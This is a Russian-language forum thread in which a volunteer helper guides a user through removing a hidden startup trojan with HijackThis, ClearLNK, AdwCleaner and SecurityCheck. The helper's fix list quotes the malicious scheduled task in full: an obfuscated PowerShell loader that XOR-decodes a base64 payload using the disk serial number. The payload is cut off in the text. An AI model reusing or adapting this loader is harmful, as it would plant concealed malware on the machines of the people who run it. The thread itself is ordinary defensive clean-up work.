Антивирусы не видят данный вирус

[affa]

Здравствуйте. Помогите пожалуйста. С недавних пор в автозагрузке появляется данный процесс
Автозагрузка.jpg
Появляется вот такая папка C:\Users\Ирина\AppData\Roaming\Microsoft\Network\C onnections\Pbk\_hiddenPbk
Папка-в-Network.jpg
В менеджере автозапуска AVZ процесс выглядит так
AVZ-менеджер-автозагрузки.jpg

Проверяла ативирусами Dr.Web CureIt!, Касперский, Malwarebytes, AVZ. Ничего не найдено. В AVZ в логе сканирования единственная запись-упоминание об этом процессе: Подозрение на скрытую загрузку библиотек через AppInit_DLLs: "c:\program files (x86)\sw-boo~1\assist~1.dll"
Похож на Trojan.MulDrop5.4381, но Доктор Веб его не видит. Не знаю, что делать.

[Info_bot]

Уважаемый(ая) affa, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Vvvyg]

Логи нужны, а не скриншоты.

[affa]

Извините.

[Vvvyg]

https://virusinfo.info/showthread.php?t=216455 - не Ваша ли тема? Логи те же самые.

[affa]

Нет, извините. Смотрела, какие должны быть логи, перепутала архивы.
Вот мой

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = podsolnushki.com
R3 - HKCU\..\URLSearchHooks: (no name) - {09900DE8-1DCA-443F-9243-26FF581438AF} - (no file)
O3 - Toolbar: (no name) - {09900DE8-1DCA-443F-9243-26FF581438AF} - (no file)
O4 - MSConfig\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HandyAndy.lnk - C:\Program Files\Andy\HandyAndy.exe (2017/02/15) (file missing)
O4 - MSConfig\startupfolder: C:^Users^Ирина^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Punto Switcher.lnk - C:\Program Files (x86)\Yandex\Punto Switcher\punto.url (2013/11/01)
O4 - MSConfig\startupfolder: C:^Users^Ирина^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^_uninst_10837118.lnk - C:\Users\Ирина\AppData\Local\Temp\_uninst_10837118.bat (2014/11/09) (file missing)
O4 - MSConfig\startupfolder: C:^Users^Ирина^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^_uninst_33520926.lnk - C:\Users\Ирина\AppData\Local\Temp\_uninst_33520926.bat (2015/01/16) (file missing)
O4 - MSConfig\startupfolder: C:^Users^Ирина^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^_uninst_54411161.lnk - C:\Users\Ирина\AppData\Local\Temp\_uninst_54411161.bat (2014/10/10) (file missing)
O4 - MSConfig\startupfolder: C:^Users^Ирина^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^_uninst_55470951.lnk - C:\Users\Ирина\AppData\Local\Temp\_uninst_55470951.bat (2015/04/11) (file missing)
O4 - MSConfig\startupreg: [GoogleUpdater] C:\Users\Ирина\AppData\Local\Google\Profile\service.exe C:\Users\Ирина\AppData\Local\Google\Profile (file missing) (HKCU) (2016/10/24)
O4 - MSConfig\startupreg: [QQ2009] C:\Program Files (x86)\Tencent\QQIntl\Bin\QQ.exe /background (HKCU) (2015/02/03)
O4 - MSConfig\startupreg: [SunJavaUpdateSched] C:\Program Files (x86)\Java\jre1.8.0_91\bin\jusched.exe  (file missing) (HKLM) (2016/06/11)
O4 - MSConfig\startupreg: [SyncManPath] C:\Users\Ирина\AppData\Roaming\Yandex\YandexDisk\YandexDisk.exe -autostart (file missing) (HKCU) (2014/08/14)
O4 - MSConfig\startupreg: [Update] C:\Users\Ирина\AppData\Roaming\Microsoft\Network\dllchosts.exe  (file missing) (HKCU) (2017/11/26)
O4 - MSConfig\startupreg: [amigo] C:\Users\Ирина\AppData\Local\Amigo\Application\amigo.exe --no-startup-window (file missing) (HKCU) (2015/04/11)
O20-32 - AppInit_DLLs: c:\program files (x86)\sw-boo~1\assist~1.dll
O22 - Task (Ready): \AVAST Software\Avast settings backup - C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (file missing)
O22 - Task (Running): \Microsoft\Windows\UPnP\UPnP - C:\Program Files\Windows NT\Accessories\task.exe -Command "function dec([byte[]]$cb, [string]$pass){$pb = [System.Text.Encoding]::UTF8.GetBytes($pass);$s = $pb[0];$j=0;for($i = 0; $i -lt $cb.Count; $i++){if($j -ge $pb.Count){$j=0} $s = (23 -band $s -bor 152) -bxor $s;$cb[$i] = $cb[$i] -bxor $pb[$j] -bxor $s;$j++}return $cb;}$obj = gwmi win32_diskdrive | where {$_.DeviceID -eq '\\.\PHYSICALDRIVE0'} | select Model, Serialnumber;$d = dec ([System.Convert]::FromBase64String('uHa7JaEw5kDeXbE04ky4UsBQyiqWNYlwjRuBEcUEjhDAT9UHlQ+dDJ9OiBXVFYoEmxSeS4oIi1uSXtgB3ln2TIkA3V7dR9Fw4XHtfuhfuSrIQaFE4A+cD59ivF+8NJsIkwiNJ5MOzFTBQIJWzknaIYoQlgWtBZgrkhHVVchT1VDKSNQptDyxLdFDkQz3ertf5HHiH6Ukuwn7fOQE11PaP6w/2SKbEY8DjSObBpsSk0/PU81OyVbYW/BEikDHQLUAjU20BpEGnxzcMYUbiASQTbMA6DHMfeNC+x/0fdBDuCe/T8hO3yayI9shjw+aOYkC2l3aO6kZiRSfDdQunxTUN58CqAWKEJ8TjznBWb8amQOIDdRFnAfUXpY76TbAfuUf+0WNFeZB7AWREo1y6DHVNIlAwF/eFcFq3hLUNYkFiCGdBZQU2l3aRI8BwG/eEtUUiQyEEdxf3EyMWvdHjxbsP6Y4pWCnN+lwqgT6Y+YPiwXAOKc

Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".

Код:

>>>  "C:\Users\Ирина\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Вконтакте.lnk"         -> ["C:\Users\Ирина\AppData\Local\Amigo\Application\vk.exe"  =>> hxxp://r.mail.ru/n137259063]
>>>  "C:\Users\Ирина\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk"     -> ["C:\Users\Ирина\AppData\Local\Amigo\Application\ok.exe"  =>> hxxp://r.mail.ru/n137259061]
>>>  "C:\Users\Ирина\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk"      -> ["C:\Program Files (x86)\Internet Explorer\iexplore.url"  =>> -extoff]
>>>  "C:\Users\Ирина\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch-\Launch Internet Explorer Browser.lnk"     -> ["C:\Program Files (x86)\Internet Explorer\iexplore.url"]
>>>  "C:\Users\Ирина\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Амиго.lnk"   -> ["C:\Users\Ирина\AppData\Local\Amigo\Application\amigo.exe"]

Отчёт о работе прикрепите.
Mail.Ru Агент используете? Если нет - удалите, QQ International и SpyHunter тоже.

Сделайте лог Malwarebytes AdwCleaner.

[affa]

Программы удалила. После удаления, как я поняла SpyHunter, еле запустила систему.

В HijackThis последней строчки "O22 - Task (Running): \Microsoft\Windows\UPnP\UPnP - C:\Program Files\Windows NT\Accessories\task.exe...." не было.

Остальное все, вроде, нормально.

[Vvvyg]

Запустите повторно Malwarebytes AdwCleaner (в Windows Vista/7/8 необходимо запускать через правую кнопку мыши от имени администратора)), нажмите кнопку Сканировать (Scan), по окончании сканирования уберите галочку на вкладках Папки (Folders) и Реестр (Registry) с пункта, C:\Program Files (x86)\DNS Games - если нужны эти игры.

Установите в пункте меню "Настройки" (Settings) дополнительно к установленным по умолчанию галочку "Сброс политик Chrome".
Затем нажмите Очистить (Cleaning) и по окончании удаления перезагрузите систему по требованию программы.

Затем нажмите Очистка (Cleaning) и по окончании удаления перезагрузите систему по требованию программы.

После входа в систему откроется отчёт AdwCleaner - файл AdwCleaner[C0].txt, прикрепите к своему следующему сообщению.

Очистите кэш и cookies-файлы браузеров и сообщите, что с проблемами.

[affa]

Все сделала, пока в автозагрузке процесса Update нет, папка Network пуста.

[Vvvyg]

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.

[affa]

Сделала.

[Vvvyg]

Internet Explorer 9.0.8112.16421 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Уведомлять о загрузке и установке обновлений
Центр обновления Windows (wuauserv) - Служба остановлена

Рекомендую включить автоматическое обновление, пропустили очень много критических обновлений системы.

Java 8 Update 91 v.8.0.910.15 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u152-windows-i586.exe)^
--------------------------- [ AppleProduction ] ---------------------------
QuickTime 7 v.7.79.80.95 Данная программа больше не поддерживается разработчиком и имеет известные проблемы безопасности! Рекомендуется деинсталлировать данное ПО.
--------------------------- [ AdobeProduction ] ---------------------------
Adobe AIR v.3.1.0.4880 Внимание! Скачать обновления

Setup v.17.0.0.199 << Скрыта Внимание! Подозрение на Adware!

Удалите эту программу.

И всё на этом.

[affa]

Спасибо огромное. В автозагрузке процесса нет, но вот папка Connections в Network все равно появляется. Это не страшно?

[Vvvyg]

Это нормально.

Запустите AdwCleaner и нажмите Файл (File) -> Деинсталлировать (Uninstall).

Выполните рекомендации после лечения.